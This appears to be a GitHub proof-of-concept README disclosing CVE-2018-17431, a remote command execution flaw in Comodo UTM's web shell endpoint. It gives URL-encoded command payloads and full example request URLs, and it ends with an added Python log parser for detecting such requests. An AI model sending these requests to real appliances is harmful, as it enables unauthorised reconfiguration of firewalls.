Fadavvi/CVE-2018-17431-PoC

CVE-2018-17431-PoC

Proof of concept for CVE-2018-17431

Exploit Title: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)

Exploit Author: Milad Fadavvi

Vendor Homepage: https://www.comodo.com/

Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

Version: before 2.7.0 & 1.5.0

Tested on: Windows: Firefox/Chrome - Kali: Firefox

Discovery Date: 2018-08-15 (reported the same day)

Confirmation that the bug exists: 2018-09-22 (Ticket ID: XWR-503-79437)

Patch released: 2018-11-23 Release Notes from Comodo

Exploit:

  1. WebShell simulation:

     For example, disabling SSH in the web shell looks like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Encode

     Encode the above sequence with URL encoding
     (I used the Burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Run

     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (an extra Enter key to run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

A page with the message "Configuration has been altered" will show up, and the configuration is changed!

With this technique, we can simulate all WebShell commands.
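
For responders reviewing an appliance's web logs, the following added example (not part of the original PoC) rebuilds the commands carried in the `k` parameter of `/manage/webshell/u` requests. The combined log format, the sample lines and the client addresses are constructed assumptions; only the path and the parameter names come from the URLs above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (an assumption; adapt the
# regex to whatever the proxy or appliance in front of the web UI writes).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Aug/2018:17:34:00 +0000] "GET /manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152 HTTP/1.1" 200 512
203.0.113.7 - - [16/Aug/2018:17:34:01 +0000] "GET /manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152 HTTP/1.1" 200 498
198.51.100.20 - - [16/Aug/2018:17:35:10 +0000] "GET /manage/index.html HTTP/1.1" 200 9021
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WEBSHELL_PATH = "/manage/webshell/u"  # path taken from the URLs on this page


def reconstruct_commands(log_text):
    """Return {(client_ip, s): [command, ...]} rebuilt from the k parameter."""
    keystrokes = defaultdict(str)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m["target"])
        if url.path != WEBSHELL_PATH:
            continue
        # parse_qs percent-decodes values, so %0a becomes "\n"
        qs = parse_qs(url.query, keep_blank_values=True)
        session = (m["ip"], qs.get("s", ["?"])[0])
        keystrokes[session] += "".join(qs.get("k", []))
    # Each newline is an Enter key; drop the empty entries left by bare Enters
    return {
        session: [cmd for cmd in typed.split("\n") if cmd]
        for session, typed in keystrokes.items()
    }


if __name__ == "__main__":
    for (ip, s), commands in reconstruct_commands(SAMPLE_LOG).items():
        print(f"{ip} s={s}: {' > '.join(commands)}")
```

Any reconstructed sequence that does not match an administrator's known session is worth correlating with configuration-change records on the appliance.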